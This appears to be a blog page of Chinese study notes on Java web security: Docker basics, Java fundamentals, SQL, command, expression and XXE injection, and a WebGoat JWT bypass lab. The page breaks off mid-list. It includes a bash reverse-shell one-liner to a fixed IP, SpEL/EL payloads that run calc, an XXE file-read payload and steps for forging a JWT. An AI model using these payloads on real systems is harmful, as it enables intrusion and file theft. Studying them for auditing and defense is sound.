<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="ms08067docker123456789101112131415161718192021222324252627windows版本官网安装setting 有个wsl要注意下docker run ubuntu echo &quot;hello world&quot;		#测试docker安装docker search tomcat		搜索镜像docker pull tomcat			下载镜像do">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2023/07/05/java%E5%AE%89%E5%85%A8/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="ms08067docker123456789101112131415161718192021222324252627windows版本官网安装setting 有个wsl要注意下docker run ubuntu echo &quot;hello world&quot;		#测试docker安装docker search tomcat		搜索镜像docker pull tomcat			下载镜像do">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="c:\Users\hyy\Desktop\java%E5%AE%89%E5%85%A8.assets\image-20230509145145937.png">
<meta property="og:image" content="c:\Users\hyy\Desktop\java%E5%AE%89%E5%85%A8.assets\image-20230510003152090.png">
<meta property="og:image" content="c:\Users\hyy\Desktop\java%E5%AE%89%E5%85%A8.assets\image-20230510003834007.png">
<meta property="og:image" content="c:\Users\hyy\Desktop\java%E5%AE%89%E5%85%A8.assets\image-20230510004559936.png">
<meta property="article:published_time" content="2023-07-05T06:46:12.657Z">
<meta property="article:modified_time" content="2023-07-04T15:50:03.117Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:\Users\hyy\Desktop\java%E5%AE%89%E5%85%A8.assets\image-20230509145145937.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-java安全" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2023/07/05/java%E5%AE%89%E5%85%A8/" class="article-date">
  <time class="dt-published" datetime="2023-07-05T06:46:12.657Z" itemprop="datePublished">2023-07-05</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="ms08067"><a href="#ms08067" class="headerlink" title="ms08067"></a>ms08067</h1><h3 id="docker"><a href="#docker" class="headerlink" title="docker"></a>docker</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">windows版本官网安装</span><br><span class="line">setting 有个wsl要注意下</span><br><span class="line"></span><br><span class="line">docker run ubuntu echo &quot;hello world&quot;		#测试docker安装</span><br><span class="line">docker search tomcat		搜索镜像</span><br><span class="line">docker pull tomcat			下载镜像</span><br><span class="line">docker images				列出本地镜像</span><br><span class="line">docker rmi ubuntu或image ID或container ID		删除镜像</span><br><span class="line">docker run -p 8080:8080 -d dordoka/tomcat</span><br><span class="line">	-d 容器在后台运行</span><br><span class="line">	-p 容器内端口绑定到指定的主机端口</span><br><span class="line">	-P 容器内端口随机映射到主机端口</span><br><span class="line">	-t 提供终端输入</span><br><span class="line">	-i 提供交互</span><br><span class="line">	http://127.0.0.1:8080/host-manager/html</span><br><span class="line">docker ps			#查看容器</span><br><span class="line">	-a 列出所有容器</span><br><span class="line">	-q 仅列出容器id</span><br><span class="line">docker stop dordoka/tmocat或image ID或container ID</span><br><span class="line">docker exec -it fe98 /bin/bash</span><br><span class="line">	exit退出</span><br><span class="line">docker start 标识</span><br><span class="line">docker restart 标识</span><br><span class="line">docker rm 容器id			删除容器</span><br><span class="line">docker cp ./aa.txt fe98:/root/		复制文件</span><br><span class="line"></span><br><span class="line">docker-compose文件存在image镜像配置文件包括端口之类</span><br></pre></td></tr></table></figure>

<h3 id="java基础知识"><a href="#java基础知识" class="headerlink" title="java基础知识"></a>java基础知识</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line">访问控制修饰符 default public protected private</span><br><span class="line">非...		final abstract static synchronized</span><br><span class="line"></span><br><span class="line">变量 			局部变量 类变量(静态变量) 成员变量(非静态变量)</span><br><span class="line">数组			存储在堆上 保存多个同类型变量</span><br><span class="line">枚举			限制变量只能在预先设定好的值</span><br><span class="line"></span><br><span class="line">继承			被继承的超类 super class 派生类为子类 subclass</span><br><span class="line">*************java ee分层模型</span><br><span class="line">	Domain Object		java对象组成 包含各自所需的业务逻辑方法</span><br><span class="line">	Data Access Object	数据库访问对象 实现数据库增删改查</span><br><span class="line">	Service				业务逻辑对象组成 系统所需要的业务逻辑方法</span><br><span class="line">	Controller			用于拦截用户请求 调用业务逻辑方法 去处理 结果发给View</span><br><span class="line">	View</span><br><span class="line">	</span><br><span class="line">*************MVC框架简述</span><br><span class="line">	Model View Controller</span><br><span class="line">	servlet API -》 Struts -》 EJB -》 Spring -》 Spring MVC</span><br><span class="line"></span><br><span class="line">1.基础语法掌握</span><br><span class="line">2.看懂代码实现的逻辑</span><br><span class="line">3.各个框架的搭建使用方法</span><br><span class="line">4.快速判断审计项目使用什么框架写的 jar包 看配置 代码引入类</span><br><span class="line"></span><br><span class="line">*************java servlet 核心技术</span><br><span class="line">	web.xml	&lt;?xml ...?&gt; &lt;web-app&gt;</span><br><span class="line">        &lt;servlet&gt;配置入口</span><br><span class="line">            &lt;description&gt;</span><br><span class="line">            &lt;display-name&gt;web应用名字</span><br><span class="line">            &lt;servlet-name&gt;声明servlet名称以便后面映射使用</span><br><span class="line">            &lt;servlet-class&gt;对应类路径</span><br><span class="line">        &lt;servlet-mapping&gt;路径入口</span><br><span class="line">            &lt;servlet-name&gt;上文配置servlet名称</span><br><span class="line">            &lt;url-pattern&gt;组件访问路径</span><br><span class="line">*************java filter 核心技术</span><br><span class="line">	servlet提供filter接口</span><br><span class="line">	对所有web资源管理 实现权限访问控制 过滤敏感词汇 压缩响应信息</span><br><span class="line">	web.xml &lt;?xml ...?&gt; &lt;web-app&gt;</span><br><span class="line">		&lt;filter&gt;</span><br><span class="line">			&lt;filter-name&gt; &lt;filter-class&gt;</span><br><span class="line">		&lt;filter-mapping&gt;</span><br><span class="line">	多个filter web.xml先申明先执行</span><br><span class="line">	</span><br><span class="line">*************java 反射机制</span><br><span class="line">	在静态语⾔中，⼀般对象的类型都是在编译期就确定下来的。⽽通过 Java 反射机制，可以动态的创建对象并调⽤其⽅法和属性</span><br><span class="line">	C/C++ 不存在反射 使运行中的程序能够获取自身的信息 可操作类或对象内部属性</span><br><span class="line">	程序运行时查找对象所属的类 任意一个类的成员变量和方法 构造一个类的对象 调用任意一个对象的方法</span><br><span class="line">	命令执行类</span><br><span class="line">		java.lang.Runtime主要方法getRuntime()返回RUntime类的对象</span><br><span class="line">			Runtime类调用exec()方法执行命令</span><br><span class="line">	获取类的对象方法</span><br><span class="line">		1.Forname() 2.直接获取 3.getClass() 4.getSysClassLoadaer().loadClass()</span><br><span class="line">不安全的反射 无视类方法、变量访问权限修饰符，调用任意类的任意方法、访问并修改成员变量值</span><br><span class="line"></span><br><span class="line">*************类加载</span><br><span class="line">java源文件(xx.java)通过javac编译成字节码文件(xx.class) 再使用类加载器加载到JVM</span><br><span class="line"></span><br><span class="line">加载Load-&gt;Link链接-&gt;Initialize初始化</span><br><span class="line">	将类的.class文件中二进制数据读入内存中，把它放进运行时数据区的方法内，然后在堆区创建java.lang.Class对象</span><br><span class="line">	将创建成的类合并至java虚拟机中，使之能执行的过程</span><br><span class="line">	JVM负责的类进行初始化</span><br><span class="line"></span><br><span class="line">*************动态代理</span><br></pre></td></tr></table></figure>

<h3 id="5-1-sql注入"><a href="#5-1-sql注入" class="headerlink" title="5.1 sql注入"></a>5.1 sql注入</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">SQL注入的根本原因在于SQL语句的拼接构造。</span><br><span class="line">1. JDBC字符串拼接</span><br><span class="line">JDBC有两种方式执行SQL语句，分别为**PreparedStatement**和**Statement**。</span><br><span class="line">- Statement方法在每次执行时都需要编译</span><br><span class="line">- PreparedStatement会对SQL语句进行预编译，后续无需重新编译</span><br><span class="line">理论上PrepareStatement的效率和安全性会比Statement要好</span><br><span class="line"></span><br><span class="line">2. 框架使用不当造成SQL注入</span><br><span class="line">Mybatis</span><br><span class="line">	`#`的`$`的区别</span><br><span class="line">        `#`号会点语句进行预编译</span><br><span class="line">        **$&#123; &#125; 只是进行string替换，动态解析SQL的时候会进行变量替换**</span><br><span class="line"></span><br><span class="line">指定操作数据库的文件 建立session会话</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">MybatisDemo</span> <span class="keyword">extends</span> <span class="title class_">HttpServlet</span> &#123;</span><br><span class="line">    <span class="keyword">private</span>  SqlSession session ;</span><br><span class="line">    <span class="keyword">private</span> InputStream in ;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">init</span><span class="params">()</span> <span class="keyword">throws</span> ServletException &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            in = Resources.getResourceAsStream(<span class="string">&quot;SqlMapConfig.xml&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IOException e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="type">SqlSessionFactoryBuilder</span> <span class="variable">builder</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">SqlSessionFactoryBuilder</span>();</span><br><span class="line">        <span class="type">SqlSessionFactory</span> <span class="variable">factory</span> <span class="operator">=</span> builder.build(in);</span><br><span class="line">         session = factory.openSession();</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Hibernate</span><br><span class="line">特有的语法</span><br><span class="line">hibernate.cfg.xml 操作数据库的文件</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">表名作为变量 需要进行拼接</span><br><span class="line">select * from `user`   </span><br><span class="line">select * from &#x27;user&#x27; #报错</span><br><span class="line">使用order需要拼接</span><br><span class="line">select * from user order by name</span><br><span class="line">select * from user order by &#x27;name&#x27; #语义不对 </span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">参考</span><br><span class="line">https://xz.aliyun.com/t/7919</span><br><span class="line">[Java安全编码之sql注入](https://www.anquanke.com/post/id/212897)</span><br><span class="line">[深入理解SQL注入与预编译（下）](https://blog.nowcoder.net/n/be73b8f592504ae8b1d00368433061be)</span><br></pre></td></tr></table></figure>

<h3 id="5-3-注入"><a href="#5-3-注入" class="headerlink" title="5.3 注入"></a>5.3 注入</h3><h4 id="命令注入"><a href="#命令注入" class="headerlink" title="命令注入"></a>命令注入</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">Runtime类调用系统命令</span><br><span class="line">	String cmd = req.getParameter(&quot;cmd&quot;);</span><br><span class="line">	Process process = Runtime.getRuntime().exec(cmd);</span><br><span class="line">Runtime类底层调用ProcessBuilder类</span><br><span class="line">	ProcessBuilder pb = new ProcessBuilder(cmd);</span><br><span class="line">	Process process = pb.start();</span><br><span class="line">	</span><br><span class="line">        //不能执行</span><br><span class="line">//        String cmd = &quot;ping baidu.com &amp; dir&quot;;</span><br><span class="line">//        String[] cmd = &#123;&quot;ping&quot;, &quot;baidu.com &amp; dir&quot;&#125;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        //能执行</span><br><span class="line">        String cmd = &quot;ping baidu.com&quot;;</span><br><span class="line">//        String cmd = &quot;cmd /c ping baidu.com &amp; dir&quot;;</span><br><span class="line">//        String cmd = &quot;cmd /c \&quot;ping baidu.com &amp; dir\&quot;&quot;;</span><br><span class="line">//        String[] cmd = &#123; &quot;cmd&quot;, &quot;/c&quot;,&quot;ping baidu.com &amp; dir&quot;&#125;;</span><br><span class="line">//        String[] cmd = &#123; &quot;cmd&quot;, &quot;/c&quot;,&quot;ping&quot;, &quot;baidu.com&quot;, &quot;&amp;&quot;, &quot;dir&quot;&#125;;</span><br><span class="line"></span><br><span class="line">        Process process = Runtime.getRuntime().exec(cmd);</span><br><span class="line">        </span><br><span class="line">	cmd /c dir 执行完dir后关闭命令窗口 </span><br><span class="line">	/k	不关闭</span><br><span class="line">	/c(clean) /k(keep)</span><br><span class="line"></span><br><span class="line">/bin/bash -c &quot;echo 111 &gt; 1.txt&quot;			#一定要加双引号</span><br><span class="line">/bin/bash -c echo 111 &gt; 1.txt			#没有写进去</span><br><span class="line">经典反弹shell</span><br><span class="line">/bin/bash -c &#x27;bash -i &gt;&amp; /dev/tcp/192.168.213.130/4444 0&gt;&amp;1&#x27;</span><br></pre></td></tr></table></figure>

<h4 id="代码注入"><a href="#代码注入" class="headerlink" title="代码注入"></a>代码注入</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">案例SpLE</span><br><span class="line">程序中存在某种功能直接执行java代码 比如反射机制</span><br><span class="line">此处obj缺start()方法 method缺&quot;calc&quot;参数 使用method.invoke(obj)调用</span><br><span class="line">Apache Commons collections 反序列化漏洞存在这个问题</span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\hyy\Desktop\java安全.assets\image-20230509145145937.png" alt="image-20230509145145937"></p>
<h4 id="表达式注入"><a href="#表达式注入" class="headerlink" title="表达式注入"></a>表达式注入</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">案例SpLE</span><br><span class="line">本质为java代码的另一种形式 Struts的OGNL表达式-&gt;远程代码执行</span><br><span class="line">jsp中表达式注入	需要递归解析</span><br><span class="line">SimpleEvaluationContext用不了</span><br><span class="line">StandardEvaluationContext有可能 高版本spring boot对输入的内容进行限制防止递归解析</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page contentType=&quot;text/html;charset=UTF-8&quot; language=&quot;Java&quot; %&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">  &lt;head&gt;</span><br><span class="line">    &lt;title&gt;EL表达式实例页面&lt;/title&gt;</span><br><span class="line">  &lt;/head&gt;</span><br><span class="line">  &lt;body&gt;</span><br><span class="line">  &lt;center&gt;</span><br><span class="line">    &lt;h3&gt; 输入的name值为：$&#123;param.name&#125;&lt;/h3&gt;</span><br><span class="line">  &lt;/center&gt;</span><br><span class="line">  &lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page contentType=&quot;text/html;charset=UTF-8&quot; language=&quot;Java&quot; %&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">  &lt;head&gt;</span><br><span class="line">    &lt;title&gt;$Title$&lt;/title&gt;</span><br><span class="line">  &lt;/head&gt;</span><br><span class="line">  &lt;body&gt;</span><br><span class="line">  $&#123;Runtime.getRuntime().exec(&quot;calc&quot;)&#125;</span><br><span class="line">  &lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">    @RequestMapping(&quot;/vul&quot;)</span><br><span class="line">    public String vul(String message)&#123;</span><br><span class="line">        /*</span><br><span class="line">        payload</span><br><span class="line">        http://127.0.0.1:8080/vul?message=$&#123;new%20java.lang.ProcessBuilder(new%20java.lang.String(new%20byte[]&#123;99,97,108,99&#125;)).start()&#125;</span><br><span class="line">         */</span><br><span class="line">        throw new IllegalArgumentException(message);</span><br><span class="line">    &#125;</span><br><span class="line">    @RequestMapping(&quot;/demo&quot;)</span><br><span class="line">    public String demo(String payload)&#123;</span><br><span class="line">        /*</span><br><span class="line">        http://127.0.0.1:8080/demo?payload=T(Runtime).getRuntime().exec(&quot;calc&quot;)</span><br><span class="line">         */</span><br><span class="line">        ExpressionParser parser = new SpelExpressionParser();</span><br><span class="line">        EvaluationContext evaluationContext = new StandardEvaluationContext();</span><br><span class="line">//        EvaluationContext evaluationContext = SimpleEvaluationContext.forReadOnlyDataBinding().build();</span><br><span class="line">        //表达式部分可控</span><br><span class="line">        Expression expression = parser.parseExpression(payload);</span><br><span class="line">        expression.getValue(evaluationContext);</span><br><span class="line">        return &quot;SpELl 注入测试&quot;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h4 id="模板注入"><a href="#模板注入" class="headerlink" title="模板注入"></a>模板注入</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">案例FreeMarkerDemo</span><br><span class="line">OFCMS 1.1.3后台Freemarker模板注入</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="5-4-Xml外部实体注入"><a href="#5-4-Xml外部实体注入" class="headerlink" title="5.4 Xml外部实体注入"></a>5.4 Xml外部实体注入</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?data=&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [   &lt;!ELEMENT foo ANY &gt;  &lt;!ENTITY xxe SYSTEM &quot;file:///c:/windows/win.ini&quot; &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;&quot;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">try &#123;</span><br><span class="line">           DocumentBuilderFactory docFactory = DocumentBuilderFactory. newInstance();</span><br><span class="line">           DocumentBuilder docBuilder = docFactory.newDocumentBuilder();</span><br><span class="line">           Document doc = docBuilder.parse(new InputSource(new StringReader(request.getParameter(&quot;data&quot;))));</span><br><span class="line"></span><br><span class="line">           NodeList RegistrationNo = doc.getElementsByTagName(&quot;foo&quot;);</span><br><span class="line">           tmp = RegistrationNo.item(0).getFirstChild().getNodeValue();</span><br><span class="line">      &#125; catch (Exception e) &#123;</span><br><span class="line">              out.print(e);</span><br><span class="line">      &#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">通过分析上述代码可知，漏洞成因是该PoC使用了XML解析接口javax. xml.parsers.DocumentBuilder，但却未禁用外部实体。</span><br><span class="line">修复：</span><br><span class="line">	禁用外部实体 如果业务需要引用外部实体须在后端做好参数效验</span><br><span class="line">案例OpenRSAP的testcase</span><br><span class="line">作者的审计 org.jpmml 1.4.4</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="5-2-失效的身份认证"><a href="#5-2-失效的身份认证" class="headerlink" title="5.2 失效的身份认证"></a>5.2 失效的身份认证</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">webgoat出于安全只能127.0.0.1:8080端口访问</span><br><span class="line">在火狐中about:config设置network.proxy.allow_hijacking_localhost true</span><br><span class="line">	burp和火狐都设置了12321端口</span><br><span class="line">这样抓本地服务器127.0.0.1上的包了</span><br><span class="line"></span><br><span class="line">jwt token猜解实验</span><br><span class="line">@AssignmentPath(&quot;/JWT/votings&quot;)		/WebGoat目录下/JWT/votings来请求</span><br><span class="line">请求/WebGoat/JWT/votings/login?user=xxx返回构造的jwt 算法是第一部分 claim三个元素第二部分，其中setIssuedAt设置iat时间</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\hyy\Desktop\java安全.assets\image-20230510003152090.png" alt="image-20230510003152090"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">http://jwt.io可解</span><br><span class="line">获取到jwt后 从代码中获得jwt的密码为victory 修改键值admin为true 重新构造jwt</span><br><span class="line">	在/WebGoat/JWT/votings/reset中利用</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\hyy\Desktop\java安全.assets\image-20230510003834007.png" alt="image-20230510003834007"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">还有种解法是构造的jwt的第二个点之后删掉</span><br><span class="line"></span><br><span class="line">效验签名在内置函数DefaultJwtParser.class的Jwt parse函数</span><br><span class="line">	此处断点调试 一个字符一个字符 用.分割每一部分 ...</span><br><span class="line">base64UrlEncodedHeader		第一部分</span><br><span class="line">base64UrlEncodedPayload		第二部分</span><br><span class="line">base64UrlEncodedDigest 		第三部分 签名</span><br><span class="line">下图中第一个判断base64UrlEncodedDigest会进行签名效验 如果它为null就不会进行效验</span><br><span class="line">而第二个判断base64UrlEncodedDigest处给出了它为null的处理 实例的DefaultJwt对象没有签名</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\hyy\Desktop\java安全.assets\image-20230510004559936.png" alt="image-20230510004559936"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">其他案例爆破jwt</span><br><span class="line"></span><br><span class="line">防御方式</span><br><span class="line">    * 在可能的情况下，实现多因素身份验证，以防止自动、凭证填充、暴力破解和被盗凭据再利用攻击。</span><br><span class="line">    * 不要使用发送或部署默认的凭证，特别是管理员用户。</span><br><span class="line">    * 执行弱密码检查，例如测试新或变更的密码，以纠正“排名前10000个弱密码”（https://github.com/danielmiessler/SecLists/tree/master/Passwords） 列表。</span><br><span class="line">    * 将密码长度、复杂性和循环策略与NIST-800-63 B的指导方针的5.1.1章节-记住秘密（https://pages.nist.gov/800-63-3/sp800-63b.html），或其他现代的基于证据的密码策略相一致。</span><br><span class="line">    * 确认注册、凭据恢复和API路径，通过对所有输出结果使用相同的消息，用以抵御账户枚举攻击。</span><br><span class="line">    * 限制或逐渐延迟失败的登录尝试。记录所有失败信息并在凭据填充、暴力破解或其他攻击被检测时提醒管理员。</span><br><span class="line">    * 